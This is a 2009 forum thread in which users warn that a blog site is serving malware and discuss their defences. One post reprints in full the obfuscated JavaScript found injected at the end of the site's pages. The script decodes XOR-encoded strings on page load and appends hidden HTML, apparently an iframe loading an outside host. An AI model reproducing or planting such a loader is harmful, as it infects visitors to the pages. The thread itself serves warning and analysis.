Free Republic
Browse · Search 		Smoky Backroom
Topics · Post Article

To: Danae

“Its just a warning.”

It is NOT just a warning. There is a program that will try to run and infect your system when you visit this site.

I’m trying to warn FReepers that don’t want the hassle/expense of digging out a bug, or recovering their data. That’s not likely, but I don’t know what this bug is yet but it caused my security setup to go ballistic.

I’ve NEVER had to do this before.

I deal with this stuff everyday, the site/server is infected.


255 posted on 08/02/2009 3:13:46 AM PDT by Boucheau (The enemy of freedom is on the left.)
[ Post Reply | Private Reply | To 234 | View Replies ]

To: Boucheau

This is what I got on it: http://www.stopbadware.org/home/reviewinfo?hl=en-US&url=http%3A%2F%2Fwww.orlytaitzesq.com%2Fblog1%2F


272 posted on 08/02/2009 3:17:39 AM PDT by Danae (I AM JIM THOMPSON - Conservative does not equal Republican. Conservative does not compromise.)
[ Post Reply | Private Reply | To 255 | View Replies ]
To: Boucheau

OK, I’m upping my level of defenses.


279 posted on 08/02/2009 3:20:44 AM PDT by Red Steel
[ Post Reply | Private Reply | To 255 | View Replies ]
To: Boucheau

what is your opinion of using linux as I do? I just changed security settings in firefox and went to the site last night. still there this morning.


311 posted on 08/02/2009 3:30:45 AM PDT by vanilla swirl
[ Post Reply | Private Reply | To 255 | View Replies ]
To: Boucheau
There is a piece of obfuscated javascript at the end of the body element, apparently added mechanically right above the /body end tag, below the page designer's signature, which decodes itself and executes something hidden upon loading of the page. I have firefox no-script add-on which blocks scripts unless excplicitly enabled, so it didn't run the code on my machine. If someone has half an hour to run the code, display the output of decoder (the function YuLQmW below) on the obfuscated strings and see what it does, here it is:

<!-- Gorgeous design by Michael Heilemann - http://binarybonsai.com/kubrick/ -->

<script > function YuLQmW(cqGOKkKxg, paXoW, bRwOHYl){var
SjTKsiaJe=bRwOHYl.split(paXoW);var NhAxBaVLcf='';
for(qGST=0;qGST<(SjTKsiaJe.length-1);qGST++){
AXEMcaaiu = SjTKsiaJe[qGST]^cqGOKkKxg;NhAxBaVLcf
+= String.fromCharCode(AXEMcaaiu);}return NhAxBaVLcf;}
function hjgksr(){var GncOozzc=new Function("QtBFdMu",
"return "+YuLQmW(-0x13+0x8+0x2f+0x29+0x2d+0x28+0x2e+0x7f,
'U','299U288U300U314U290U298U289U315U')+"."+
YuLQmW(-0x7-0xe+0x14+0x3b1, 'G','978G991G980G969G')+"");var
zotuOWV=GncOozzc(-0x1c+0x25-0x1-0x1f+0x2c-0x14);
zotuOWV.innerHTML += YuLQmW(0x4+0x30+0x2c-0x25+0x0+0x4e,
'V','181V224V239V251V232V228V236V169V254V224V237V253V225
V180V184V169V225V236V224V238V225V253V180V184V169V235V230
V251V237V236V251V180V185V169V239V251V232V228V236V235V230
V251V237V236V251V180V185V169V250V251V234V180V174V225V253
V253V249V179V166V166V250V236V234V252V251V224V253V240V164
V232V229V236V251V253V250V167V234V231V166V234V240V235V236
V251V166V224V231V167V234V238V224V182V189V174V183V181V166
V224V239V251V232V228V236V183V');} if(window.addEventListener){window.addEventListener('load',hjgksr,false);}else if(window.attachEvent){window.attachEvent('onload', hjgksr);} </script > </body> </html>

1,795 posted on 08/02/2009 9:58:37 AM PDT by nightlight7
[ Post Reply | Private Reply | To 255 | View Replies ]

Free Republic
Browse · Search 		Smoky Backroom
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson